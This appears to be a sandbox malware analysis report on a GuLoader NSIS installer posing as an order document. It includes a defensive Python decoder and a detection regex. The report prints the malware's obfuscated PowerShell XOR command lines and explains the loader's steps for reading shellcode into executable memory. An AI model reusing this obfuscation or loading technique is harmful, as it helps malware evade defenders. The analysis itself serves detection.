
Windows Analysis Report
Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Overview

General Information

Sample Name:Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Analysis ID:716470
MD5:297cee2e9339ab19cb96a073ca8ba85f
SHA1:b5467307b8d1bc03ca9ed311b2ca06a9806d3b47
SHA256:9d0562b4cdc6c8a65119209d1f9dc4a06ce297afe2636b68a6772a470b0301a2
Tags:exe

Detection

GuLoader
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Mass process execution to delay analysis
Executable has a suspicious name (potential lure to open the executable)
Uses 32bit PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Too many similar processes found
PE / OLE file has an invalid certificate
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64
  • Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe (PID: 5356 cmdline: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe MD5: 297CEE2E9339AB19CB96A073CA8BA85F)
    • powershell.exe (PID: 5932 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3424 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5148 cmdline: powershell.exe 0x3A3A41D7 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5528 cmdline: powershell.exe 0x656176C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4768 cmdline: powershell.exe 0x46696EC0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5192 cmdline: powershell.exe 0x41286F85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5372 cmdline: powershell.exe 0x72342289 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2856 cmdline: powershell.exe 0x20692295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4196 cmdline: powershell.exe 0x78383295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4748 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 416 cmdline: powershell.exe 0x302C22CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3568 cmdline: powershell.exe 0x20302E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5212 cmdline: powershell.exe 0x70203289 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5856 cmdline: powershell.exe 0x20692291 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3424 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5532 cmdline: powershell.exe 0x30783A95 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5476 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5648 cmdline: powershell.exe 0x30296B8B -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4056 cmdline: powershell.exe 0x723322FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3116 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3036 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2840 cmdline: powershell.exe 0x3A3A54CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5520 cmdline: powershell.exe 0x727477C4 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6024 cmdline: powershell.exe 0x6C416EC9 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2920 cmdline: powershell.exe 0x6F632ACC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5792 cmdline: powershell.exe 0x302C6B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4904 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5544 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4744 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5892 cmdline: powershell.exe 0x30783195 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4396 cmdline: powershell.exe 0x30302E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4176 cmdline: powershell.exe 0x692032DD -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5852 cmdline: powershell.exe 0x34302BD5 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1252 cmdline: powershell.exe 0x2E7233FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5464 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5572 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5732 cmdline: powershell.exe 0x3A3A51C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5836 cmdline: powershell.exe 0x74466BC9 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1896 cmdline: powershell.exe 0x65506DCC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4872 cmdline: powershell.exe 0x6E7467D7 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4628 cmdline: powershell.exe 0x28697096 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4332 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5696 cmdline: powershell.exe 0x31343091 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5108 cmdline: powershell.exe 0x202C22CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6076 cmdline: powershell.exe 0x20302ECC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5832 cmdline: powershell.exe 0x20302BCC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5532 cmdline: powershell.exe 0x2E7230FC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5668 cmdline: powershell.exe 0x6B6570CB -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4768 cmdline: powershell.exe 0x656C3197 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2108 cmdline: powershell.exe 0x3A3A50C0 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3352 cmdline: powershell.exe 0x616444CC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3724 cmdline: powershell.exe 0x6C652ACC -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5164 cmdline: powershell.exe 0x72332E85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2304 cmdline: powershell.exe 0x69207094 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1872 cmdline: powershell.exe 0x2C206B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2948 cmdline: powershell.exe 0x30783395 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5416 cmdline: powershell.exe 0x30303295 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 4196 cmdline: powershell.exe 0x2C2A6B85 -bxor 677 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup
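The 58 powershell.exe children above all have the same shape: a single hexadecimal dword, PowerShell's bitwise exclusive-or operator `-bxor`, and the constant 677 (0x2A5). Each child just evaluates that expression; there is no -Command or -EncodedCommand, and the only work done is one XOR. Reading each XOR result as four big-endian bytes yields a four-character text fragment, and the fragments, taken in process-creation order, spell out strings in the syntax of the NSIS System plugin's `System::Call` (the sample is an NSIS installer, see the nsis.sf.net string in the report). The script below is an added example, not code from Joe Sandbox or from the sample: it parses command lines of the form shown in the tree, decodes them, and splits the stream wherever a new `kernel32::` call begins. The dword list is copied from the tree; the command lines are reconstructed from it. Two points are inferences rather than page facts: that the loader consumes the results as big-endian text (this reading is the one that produces readable API calls), and that the trailing `Y` on the last chunk of each call is padding to a 4-byte boundary.

```python
"""Decode the `powershell.exe 0x<dword> -bxor 677` chain from a sandbox process tree.

Each powershell.exe child evaluates one bitwise-XOR expression. Reading the
32-bit result as four big-endian bytes gives a 4-character fragment; the
fragments, in process-creation order, concatenate into NSIS System::Call
strings (inference: this is the reading that yields readable API calls).
"""
import re

# Dwords copied, in order, from the 58 powershell.exe children in the process tree.
DWORDS_FROM_REPORT = """
0x6B6570CB 0x656C3197 0x3A3A41D7 0x656176C0 0x46696EC0 0x41286F85 0x72342289
0x20692295 0x78383295 0x30303295 0x302C22CC 0x20302E85 0x70203289 0x20692291
0x2C206B85 0x30783A95 0x2C206B85 0x30296B8B 0x723322FC
0x6B6570CB 0x656C3197 0x3A3A54CC 0x727477C4 0x6C416EC9 0x6F632ACC 0x302C6B85
0x30783395 0x30303295 0x2C206B85 0x30783195 0x30302E85 0x692032DD 0x34302BD5
0x2E7233FC
0x6B6570CB 0x656C3197 0x3A3A51C0 0x74466BC9 0x65506DCC 0x6E7467D7 0x28697096
0x2C206B85 0x31343091 0x202C22CC 0x20302ECC 0x20302BCC 0x2E7230FC
0x6B6570CB 0x656C3197 0x3A3A50C0 0x616444CC 0x6C652ACC 0x72332E85 0x69207094
0x2C206B85 0x30783395 0x30303295 0x2C2A6B85
""".split()

# Constructed command lines in exactly the form the report shows (same key, 677).
SAMPLE_CMDLINES = [f"powershell.exe {d} -bxor 677" for d in DWORDS_FROM_REPORT]

# The tell-tale shape: a bare integer expression, no -Command / -EncodedCommand.
BXOR_RE = re.compile(
    r"powershell(?:\.exe)?\s+(0x[0-9a-f]{1,8})\s+-bxor\s+(\d+)", re.IGNORECASE
)


def parse_bxor_cmdline(cmdline):
    """Return (dword, key) for a matching command line, else None."""
    m = BXOR_RE.search(cmdline)
    if not m:
        return None
    return int(m.group(1), 16), int(m.group(2))


def decode_chunk(dword, key):
    """XOR one dword with the key and read the 32-bit result as 4 big-endian bytes."""
    value = (dword ^ key) & 0xFFFFFFFF
    return value.to_bytes(4, "big").decode("latin-1")


def reassemble(cmdlines):
    """Decode every -bxor child in order and split the stream into System::Call strings.

    The split point is the DLL prefix the fragments spell out ("kernel32::");
    a loader that also calls into other DLLs would need the prefix list extended.
    """
    parsed = (parse_bxor_cmdline(c) for c in cmdlines)
    stream = "".join(decode_chunk(*p) for p in parsed if p)
    return [s for s in re.split(r"(?=kernel32::)", stream) if s]


if __name__ == "__main__":
    for call in reassemble(SAMPLE_CMDLINES):
        print(call)
```

Run against the tree, the four reassembled strings open a file named in register $4 for read (0x80000000 is GENERIC_READ, 4 is OPEN_ALWAYS), allocate 1 MiB with 0x3000 (MEM_COMMIT | MEM_RESERVE) and 0x40 (PAGE_EXECUTE_READWRITE), seek to offset 1424 in that file, and read up to 1 MiB of it into the RWX buffer; the fourth call is cut off where the page ends. That is a stage-2 loader reading shellcode out of a file, which fits the report's GuLoader verdict. Two things make this cheap to hunt for without decoding anything: the key 0x2A5 only touches the low 16 bits, so the first two characters of every chunk are in clear text in the command line (0x6B65 is "ke"), and a parent spawning dozens of powershell.exe children whose whole command line matches `^0x[0-9A-Fa-f]{8} -bxor \d+$` has no legitimate counterpart.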
No configs have been found
Source:Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 5356
Rule:JoeSecurity_GuLoader_3
Description:Yara detected GuLoader
Author:Joe Security
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | ReversingLabs: Detection: 73%
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Metadefender: Detection: 33%
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00406375 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00405823 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_004027FB FindFirstFileW
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_004052D0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
Source: conhost.exe | Process created: 57

System Summary

Source: initial sample | Static PE information: Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static file information: Suspicious name
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_0040327D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Code function: 0_2_00404B0D
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: invalid certificate
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | ReversingLabs: Detection: 73%
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Metadefender: Detection: 33%
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | File read: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
